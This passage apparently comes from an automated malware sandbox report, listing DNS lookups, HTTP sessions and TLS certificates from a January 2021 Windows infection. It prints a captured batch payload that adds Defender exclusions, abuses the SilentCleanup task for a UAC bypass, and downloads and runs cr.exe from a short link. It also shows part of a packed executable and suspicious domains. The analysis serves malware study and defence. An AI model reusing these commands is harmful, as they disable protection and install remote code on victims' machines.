                                                        Jan 8, 2021 09:08:10.112701893 CET53597708.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:11.010469913 CET6152353192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:08:11.058412075 CET53615238.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:11.073539972 CET6279153192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:08:11.121582031 CET53627918.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:11.778194904 CET5066753192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:08:11.847470999 CET53506678.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:11.870695114 CET5412953192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:08:11.934531927 CET53541298.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:26.348934889 CET6532953192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:08:26.409410000 CET53653298.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:26.413012981 CET6071853192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:08:26.469329119 CET53607188.8.8.8192.168.2.22

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Jan 8, 2021 09:06:06.904562950 CET192.168.2.228.8.8.80xd78fStandard query (0)cutt.lyA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:18.620414019 CET192.168.2.228.8.8.80x1192Standard query (0)cutt.lyA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:19.309438944 CET192.168.2.228.8.8.80x4317Standard query (0)chebo.discountmonumentcenter.comA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:24.867347002 CET192.168.2.228.8.8.80xefb6Standard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:24.946413994 CET192.168.2.228.8.8.80x3f32Standard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:51.222317934 CET192.168.2.228.8.8.80xc52eStandard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:51.323060036 CET192.168.2.228.8.8.80x8c7bStandard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:17.531116009 CET192.168.2.228.8.8.80x5a45Standard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:17.611469030 CET192.168.2.228.8.8.80xeacfStandard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:43.751187086 CET192.168.2.228.8.8.80xaf2aStandard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:43.828711987 CET192.168.2.228.8.8.80xa4a6Standard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:09.986008883 CET192.168.2.228.8.8.80x78c7Standard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:10.055391073 CET192.168.2.228.8.8.80x9788Standard query (0)telete.inA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.778194904 CET192.168.2.228.8.8.80xc5eStandard query (0)trashbininspector.funA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.870695114 CET192.168.2.228.8.8.80x1e1fStandard query (0)trashbininspector.funA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.348934889 CET192.168.2.228.8.8.80xff23Standard query (0)trashbininspector.funA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.413012981 CET192.168.2.228.8.8.80x8f4fStandard query (0)trashbininspector.funA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Jan 8, 2021 09:06:06.952363014 CET8.8.8.8192.168.2.220xd78fNo error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:06.952363014 CET8.8.8.8192.168.2.220xd78fNo error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:06.952363014 CET8.8.8.8192.168.2.220xd78fNo error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:18.668276072 CET8.8.8.8192.168.2.220x1192No error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:18.668276072 CET8.8.8.8192.168.2.220x1192No error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:18.668276072 CET8.8.8.8192.168.2.220x1192No error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:19.493421078 CET8.8.8.8192.168.2.220x4317No error (0)chebo.discountmonumentcenter.com192.185.194.191A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:24.923634052 CET8.8.8.8192.168.2.220xefb6No error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:25.002636909 CET8.8.8.8192.168.2.220x3f32No error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:51.282998085 CET8.8.8.8192.168.2.220xc52eNo error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:51.382138014 CET8.8.8.8192.168.2.220x8c7bNo error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:17.591433048 CET8.8.8.8192.168.2.220x5a45No error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:17.659508944 CET8.8.8.8192.168.2.220xeacfNo error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:43.810369015 CET8.8.8.8192.168.2.220xaf2aNo error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:07:43.890265942 CET8.8.8.8192.168.2.220xa4a6No error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:10.042922974 CET8.8.8.8192.168.2.220x78c7No error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:10.112701893 CET8.8.8.8192.168.2.220x9788No error (0)telete.in195.201.225.248A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.847470999 CET8.8.8.8192.168.2.220xc5eNo error (0)trashbininspector.fun104.18.58.219A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.847470999 CET8.8.8.8192.168.2.220xc5eNo error (0)trashbininspector.fun172.67.166.210A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.847470999 CET8.8.8.8192.168.2.220xc5eNo error (0)trashbininspector.fun104.18.59.219A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.934531927 CET8.8.8.8192.168.2.220x1e1fNo error (0)trashbininspector.fun104.18.58.219A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.934531927 CET8.8.8.8192.168.2.220x1e1fNo error (0)trashbininspector.fun172.67.166.210A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:11.934531927 CET8.8.8.8192.168.2.220x1e1fNo error (0)trashbininspector.fun104.18.59.219A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.409410000 CET8.8.8.8192.168.2.220xff23No error (0)trashbininspector.fun104.18.58.219A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.409410000 CET8.8.8.8192.168.2.220xff23No error (0)trashbininspector.fun172.67.166.210A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.409410000 CET8.8.8.8192.168.2.220xff23No error (0)trashbininspector.fun104.18.59.219A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.469329119 CET8.8.8.8192.168.2.220x8f4fNo error (0)trashbininspector.fun104.18.58.219A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.469329119 CET8.8.8.8192.168.2.220x8f4fNo error (0)trashbininspector.fun172.67.166.210A (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:08:26.469329119 CET8.8.8.8192.168.2.220x8f4fNo error (0)trashbininspector.fun104.18.59.219A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • 37.46.150.139
                                                        • chebo.discountmonumentcenter.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.224916737.46.150.13980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jan 8, 2021 09:06:11.405921936 CET72OUTGET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1
                                                        Host: 37.46.150.139
                                                        Connection: Keep-Alive
                                                        Jan 8, 2021 09:06:11.458991051 CET73INHTTP/1.1 200 OK
                                                        Date: Fri, 08 Jan 2021 08:06:11 GMT
                                                        Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.12
                                                        Last-Modified: Mon, 04 Jan 2021 21:26:11 GMT
                                                        ETag: "7d0-5b819bd338a68"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 2000
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-msdownload
                                                        Data Raw: 6d 6f 64 65 20 31 38 2c 31 0d 0a 63 6f 6c 6f 72 20 46 45 0d 0a 73 65 74 6c 6f 63 61 6c 0d 0a 66 6f 72 20 2f 66 20 22 74 6f 6b 65 6e 73 3d 34 2d 35 20 64 65 6c 69 6d 73 3d 2e 20 22 20 25 25 69 20 69 6e 20 28 27 76 65 72 27 29 20 64 6f 20 73 65 74 20 56 45 52 53 49 4f 4e 3d 25 25 69 2e 25 25 6a 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 31 30 2e 30 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 31 30 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 74 65 6d 70 22 20 3b 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 61 70 70 64 61 74 61 22 20 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 31 32 3b 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 73 3a 2f 2f 63 75 74 74 2e 6c 79 2f 30 6a 73 62 55 44 54 27 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 63 72 2e 65 78 65 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 65 6e 76 3a 61 70 70 64 61 74 61 5c 63 72 2e 65 78 65 3b 26 52 45 4d 20 22 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 32 20 3e 6e 75 6c 0d 0a 73 63 68 74 61 73 6b 73 20 2f 72 75 6e 20 2f 74 6e 20 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 44 69 73 6b 43 6c 65 61 6e 75 70 5c 53 69 6c 65 6e 74 43 6c 65 61 6e 75 70 20 2f 49 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 33 20 3e 6e 75 6c 0d 0a 72 65 67 20 64 65 6c 65 74 65 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 46 0d 0a 29 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 36 2e 33 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 38 2e 31 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 74 65 6d 70 22 20 3b 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 61 70 70 64 61 74 61 22 20 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 31 32 3b 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 73 3a 2f 2f 63 75 74 74 2e 6c 79 2f 30 6a 73 62 55 44 54 27 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 63 72 2e 65 78 65 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73
                                                        Data Ascii: mode 18,1color FEsetlocalfor /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%jif "%version%" == "10.0" ( echo "Windows 10 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;&REM " >nultimeout /t 2 >nulschtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nultimeout /t 3 >nulreg delete "HKCU\Environment" /v "windir" /F)if "%version%" == "6.3" ( echo "Windows 8.1 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Proces
                                                        Jan 8, 2021 09:06:11.459027052 CET74INData Raw: 73 20 24 65 6e 76 3a 61 70 70 64 61 74 61 5c 63 72 2e 65 78 65 3b 26 52 45 4d 20 22 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 32 20 3e 6e 75 6c 0d 0a 73 63 68 74 61 73 6b 73 20 2f 72 75 6e 20 2f 74 6e 20 5c 4d 69 63 72 6f 73 6f 66 74
                                                        Data Ascii: s $env:appdata\cr.exe;&REM " >nultimeout /t 2 >nulschtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nultimeout /t 3 >nulreg delete "HKCU\Environment" /v "windir" /F)if "%version%" == "6.2" ( echo "Windows 8 detecte


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.2249169192.185.194.19180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jan 8, 2021 09:06:19.652738094 CET81OUTGET /vantuz_2021.exe HTTP/1.1
                                                        Host: chebo.discountmonumentcenter.com
                                                        Connection: Keep-Alive
                                                        Jan 8, 2021 09:06:19.814476967 CET82INHTTP/1.1 200 OK
                                                        Date: Fri, 08 Jan 2021 08:06:19 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, Keep-Alive
                                                        Last-Modified: Mon, 04 Jan 2021 21:24:49 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 565248
                                                        Keep-Alive: timeout=5, max=75
                                                        Content-Type: application/x-msdownload
                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b2 d5 65 2a f6 b4 0b 79 f6 b4 0b 79 f6 b4 0b 79 e8 e6 8f 79 ed b4 0b 79 e8 e6 9e 79 ee b4 0b 79 e8 e6 88 79 97 b4 0b 79 d1 72 70 79 fd b4 0b 79 f6 b4 0a 79 93 b4 0b 79 e8 e6 81 79 f7 b4 0b 79 e8 e6 9f 79 f7 b4 0b 79 e8 e6 9a 79 f7 b4 0b 79 52 69 63 68 f6 b4 0b 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 b8 18 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 30 08 00 00 80 00 00 00 c0 37 04 b0 36 3f 04 00 d0 37 04 00 00 40 04 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 40 04 00 10 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 71 40 04 60 01 00 00 00 00 40 04 04 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 38 3f 04 18 00 00 00 88 f6 3f 04 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 c0 37 04 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 30 08 00 00 d0 37 04 00 28 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 80 00 00 00 00 40 04 00 74 00 00 00 2c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 2e 39 35 00 55 50 58 21 0d 09 08 02 b9 07 27 2e f1 8f 7a 31 fc 18 3f 04 af 66 07 00 00 f2 16 00 24 69 00 8b f3 bc b6 f2 80 d9 06 00 94 d7 0e a8 06 bc d6 9e d7 3e cf ec fe 14 d8 2e 28 06 44 5e ef
                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$e*yyyyyyyyyrpyyyyyyyyyyRichyPEL^076?7@@@q@`@qT8??HUPX07UPX107(@.rsrc@t,@3.95UPX!'.z1?f$i>.(D^
                                                        Jan 8, 2021 09:06:19.814513922 CET84INData Raw: b9 e7 79 76 8c 74 5f 0e b4 06 c4 7b cf f3 3c d4 e6 f4 0c a6 1c 06 de f3 3c cf 30 40 52 62 9e 36 64 e7 79 5e fb 6e ea de a6 d8 06 be ac 9c e7 dd f7 9e 8a f2 46 fe 06 10 da e6 06 40 9e e7 79 9e 50 68 74 82 92 a0 79 9e e7 79 ae bc d0 d8 e6 cf f3 da
                                                        Data Ascii: yvt_{<<0@Rb6dy^nF@yPhtyyv4R`<<lz>fy8J\j|}y<^&:F^l<<y&y<RbtfI@j?@CorExitProcess mco
                                                        Jan 8, 2021 09:06:19.814532995 CET85INData Raw: 7c 7d 7d f3 a3 3f d5 35 ec 12 ef a4 7e b7 bf fd fb 2b 9b 08 dc f2 9e 18 17 0d 20 e5 1e 29 30 3e af 42 ad cb 3e a7 27 48 7f f3 ed ff 52 25 b4 3f ab 19 c0 81 49 26 b3 1e 5e 3a c8 85 65 3e 21 ca 8e 12 ca e8 df fc cd 37 73 6c 91 ba a5 65 c3 63 62 7e
                                                        Data Ascii: |}}?5~+ )0>B>'HR%?I&^:e>!7slecb~q7rF(&?Zno'`f47jo+iUoXF.K;.'?Yh4lkQg?;+U3m8^}&S(?Y|=t:
                                                        Jan 8, 2021 09:06:19.814549923 CET86INData Raw: 75 8c c7 1e fe a2 f6 ff 1b f0 94 e7 0a 54 be a9 cb 9b c7 08 c9 3f d5 cf c1 a4 3f 89 f8 5e cd 37 7f fb e6 ad 58 09 4a 1e 21 07 50 4f 37 39 fc fe 2f bf 51 8b f5 4d f0 c1 a2 3b ac 58 a4 9e 4a 5d e2 44 1e 56 a0 eb ff fd 3a 65 3a d4 f1 f2 3e 51 d5 f6
                                                        Data Ascii: uT??^7XJ!PO79/QM;XJ]DV:e:>Q?Wm`7b;SO4Td'XwoYL"dS~_?Tx^[b+U\z#~1~nNwa>?N9aX;[Y']~@
                                                        Jan 8, 2021 09:06:19.815541029 CET88INData Raw: 5e 85 c6 4f db cc 1e f0 ff 0f 7e ed cb da 78 1e 88 fe b3 23 1f 24 15 df 3f 8b 6e 7f 7a 89 d8 06 fd d1 6f 5f 5e 94 29 20 98 5d 1e a7 82 99 e6 68 c5 de bf 27 fe 37 a6 fc f6 a7 bf 1e 79 5d 68 c0 1a 0f 01 3e 59 67 04 ef 1e 0b de 53 d1 63 0e fd fb ff
                                                        Data Ascii: ^O~x#$?nzo_^) ]h'7y]h>YgScb}?$>;@OD)^=n?:Q]D\>FnHAY^~"zp^)RQXj|L_0U>dN{c1fk?iO)/~m?0
                                                        Jan 8, 2021 09:06:19.815577984 CET89INData Raw: bf fd f6 9f 06 58 e5 9c 21 15 c7 1e 38 39 83 6c 21 c6 0e 66 12 68 ac 2b c5 fd ff e6 37 b0 06 1c e1 33 c4 29 41 6f 0a 3a c3 ef 3f f3 81 31 28 3e c2 f9 cd 6f bf 1e 12 1e 32 3a 40 c1 0e 3e ff 3f 40 40 c0 22 49 81 72 bc be e6 b7 7f bf 36 85 8a 34 b0
                                                        Data Ascii: X!89l!fh+73)Ao:?1(>o2:@>?@@"Ir64@765@Z&+-w'Q?Gpt2&Xv{9BqvMj$?3so~bV%S%@.U>
                                                        Jan 8, 2021 09:06:19.815602064 CET90INData Raw: 1e 11 5a 79 72 49 d1 e3 3f b6 fb a2 ab 13 7f 0e 8f fd d3 b2 bf f9 ff cd a7 2a 0a 54 da c7 e7 d3 e2 3f f1 dc f3 21 b3 7a d8 1f d0 7b e5 1e 6f 55 ff 37 9d ae 30 88 56 c0 e1 3f 88 38 1d 64 5e 0e ad e8 af 41 bf f9 cd ff 3b fa e0 3f c0 95 cc 77 43 92
                                                        Data Ascii: ZyrI?*T?!z{oU70V?8d^A;?wCJG7&'un?)?my??|?,"Q?/b.V3 /S?p?Va"?Tl?Pqj?Y?p,?l"?cY?\3
                                                        Jan 8, 2021 09:06:19.815625906 CET92INData Raw: 6d 3a 73 73 d7 7e 7e 9d 17 64 00 2c 20 4d 20 64 64 10 79 00 bf b6 b3 f6 00 4d 4d 2f 2a 2f 12 3f 50 4d 0a 41 06 44 65 63 bb df be fb 65 6d 62 65 72 27 4e 6f 76 65 6d 17 4f 63 74 6f 15 53 65 73 6f 7f d8 70 74 41 41 75 67 75 73 74 52 4a 75 6c 79 5f
                                                        Data Ascii: m:ss~~d, M ddyMM/*/?PMADecember'NovemOctoSesoptAAugustRJuly_qeneApr9March"}FebruGanJnnT>fFeb&f=FdaFThuorsd'WedTuesAMkfonOSunvn^NF>aA/pammid-^kingdo
                                                        Jan 8, 2021 09:06:19.815650940 CET93INData Raw: 07 10 36 04 0c 08 2d 04 03 04 0c 10 10 08 1d 08 46 4f 43 50 00 0d 72 03 be 41 06 4e 6f a7 4e 5f 35 42 80 57 4a 78 74 61 66 d6 02 5f d3 5a d3 4a 60 62 00 12 5f 3a 00 06 31 b0 5a 07 b0 7a 6e 78 a4 00 66 52 aa 3b 89 08 47 5f 68 79 72 77 76 bb aa 10
                                                        Data Ascii: 6-FOCPrANoN_5BWJxtaf_ZJ`b_:1ZznxfR;G_hyrwv_bs"lde?abNzsqrL{2`$BFB!\r0>SZ0|# .#0Xf0tT{|_1#QNA,INzK38.Sb alloT.V4p]tu>A%kg&eld"l
                                                        Jan 8, 2021 09:06:19.815670967 CET95INData Raw: ee 7f 6d d5 1d 42 cc 2e b2 9e 69 42 84 c8 d9 f6 3d 6a f0 f3 fc 1e ae 12 7f 72 68 cc 10 84 a8 bf f7 f6 77 f6 44 12 19 45 14 72 7e ec 6e 70 43 a0 74 c2 3d cf 6c fd 69 7f a3 16 20 34 27 ef 7b 5d 12 b4 18 7f b6 3f 15 f7 f0 1b 20 ac e2 f6 7d 18 58 26
                                                        Data Ascii: mB.iB=jrhwDEr~npCt=li 4'{]? }X&#&<LvRN4{,&(YoVR(:IA.S/o+k._ET_<ZEp, wW@mdhr::z$ZvEEfw|4 .$@H>l?.=wLd
                                                        Jan 8, 2021 09:06:19.972599983 CET96INData Raw: 30 ea 12 47 ee b4 7e 7e 4e da 7f f0 7b fa bd c2 3a d4 76 8b 29 46 a6 20 12 6c b0 60 3f 15 fe 2a ea bc 4e 33 6b 7a 58 38 26 40 d4 de 5f 11 7e 4f 20 7c 12 2c 65 27 62 28 12 da 5b 7e 83 3f ab ba 0b 12 82 e0 7b 73 b6 9e cb c9 cb fd da 5f 17 22 a0 76
                                                        Data Ascii: 0G~~N{:v)F l`?*N3kzX8&@_~O |,e'b([~?{s_"vVx&:;1}o;\BtU&_{\ld,N%umM&Nn-.:n]a>~]tJN}0Vw{~NJAev&]+(Wdb' N#kb8&X


                                                        HTTPS Packets

                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                        Jan 8, 2021 09:06:07.078320026 CET104.22.1.232443192.168.2.2249165CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USSat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                        CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Nov 02 13:24:33 CET 2017Tue Nov 02 13:24:33 CET 2027
                                                        Jan 8, 2021 09:06:18.773220062 CET104.22.1.232443192.168.2.2249168CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USSat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
